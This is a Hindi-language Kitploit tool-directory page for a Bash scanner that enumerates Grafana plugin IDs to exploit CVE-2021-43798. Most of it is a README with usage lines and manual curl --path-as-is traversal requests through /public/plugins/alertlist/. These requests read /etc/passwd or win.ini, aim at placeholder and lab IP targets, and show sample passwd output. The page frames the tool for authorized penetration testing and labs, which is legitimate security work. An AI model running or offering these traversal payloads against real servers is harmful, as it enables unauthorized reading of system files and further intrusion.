Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — Grafana प्लगइन ID की गणना करने और कमजोर इंस्टेंस पर /etc/passwd या win.ini पढ़ने का प्रयास करके CVE-2021-43798 डायरेक्टरी ट्रैवर्सल का परीक्षण करने वाला Bash-आधारित स्कैनर। | Kitploit
उपकरण/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
भेद्यता स्कैनरवेब भेद्यता स्कैनरशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubsqu1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

Grafana प्लगइन ID की गणना करने और कमजोर इंस्टेंस पर /etc/passwd या win.ini पढ़ने का प्रयास करके CVE-2021-43798 डायरेक्टरी ट्रैवर्सल का परीक्षण करने वाला Bash-आधारित स्कैनर।

रिपॉजिटरी देखें
114घं 15मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Grafana CVE-2021-43798 प्लगइन एन्यूमरेटर

Grafana इंस्टेंस को CVE-2021-43798 के लिए परीक्षण करने हेतु एक छोटा Bash-आधारित टूल, जो कि कमजोर Grafana संस्करणों को प्रभावित करने वाली डायरेक्टरी ट्रैवर्सल भेद्यता है।

यह टूल Grafana प्लगइन IDs की गणना करता है और curl --path-as-is का उपयोग करके यह परीक्षण करता है कि क्या डायरेक्टरी ट्रैवर्सल किसी ज्ञात फ़ाइल तक पहुँच सकता है।

केवल अधिकृत सुरक्षा परीक्षण और लैब वातावरण के लिए।

फ़ाइलें

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh: C:\Windows\win.ini तक पहुँच का परीक्षण करता है
  • grafana-linux.sh: /etc/passwd तक पहुँच का परीक्षण करता है
  • plugins.txt: एन्यूमरेशन के दौरान उपयोग किए जाने वाले Grafana प्लगइन IDs वाली एक वर्डलिस्ट।

आवश्यकताएँ

  • Bash
  • curl
  • एक Grafana लक्ष्य
  • लक्ष्य का परीक्षण करने की अनुमति

जाँचें कि curl इंस्टॉल है:

root@kitploit:~
curl --version

स्क्रिप्ट्स को निष्पादन योग्य बनाएँ:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

CVE-2021-43798 अवलोकन

CVE-2021-43798, Grafana में एक डायरेक्टरी ट्रैवर्सल भेद्यता है।

कमजोर एंडपॉइंट इसके आसपास आधारित है: /public/plugins/<plugin-id>/

यह भेद्यता इच्छित प्लगइन डायरेक्टरी के बाहर ट्रैवर्सल की अनुमति दे सकती है।

curl के साथ परीक्षण करते समय महत्वपूर्ण भाग है: --path-as-is

इस विकल्प के बिना, क्लाइंट सर्वर को भेजने से पहले पथ को सामान्यीकृत कर सकता है।

Windows स्कैनर

Windows स्कैनर निम्नलिखित को पुनःप्राप्त करने का प्रयास करता है: C:\Windows\win.ini

पथ को HTTP अनुरोध में इस प्रकार दर्शाया गया है: Windows/win.ini

बुनियादी उपयोग

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

उदाहरण:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Windows मैनुअल परीक्षण

आप इसके साथ मैन्युअल रूप से एक प्लगइन का परीक्षण कर सकते हैं:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

लैब लक्ष्य के लिए:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

एक सफल प्रतिक्रिया में Windows INI फ़ाइल सामग्री होनी चाहिए।

Linux स्कैनर

Linux स्कैनर निम्नलिखित को पुनःप्राप्त करने का प्रयास करता है: /etc/passwd

बुनियादी उपयोग

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

सामान्य उदाहरण:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Linux मैनुअल परीक्षण

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

लैब लक्ष्य के लिए:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

एक सफल Linux प्रतिक्रिया में इसके समान प्रविष्टियाँ होनी चाहिए:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

कमांड-लाइन विकल्प

दोनों स्कैनर समान बुनियादी तर्कों का उपयोग करते हैं:

  • u, --url : Grafana बेस URL
  • w, --wordlist : प्लगइन वर्डलिस्ट
  • f, --file : परीक्षण करने के लिए फ़ाइल
  • h, --help : सहायता दिखाएँ
टूल डाउनलोड करें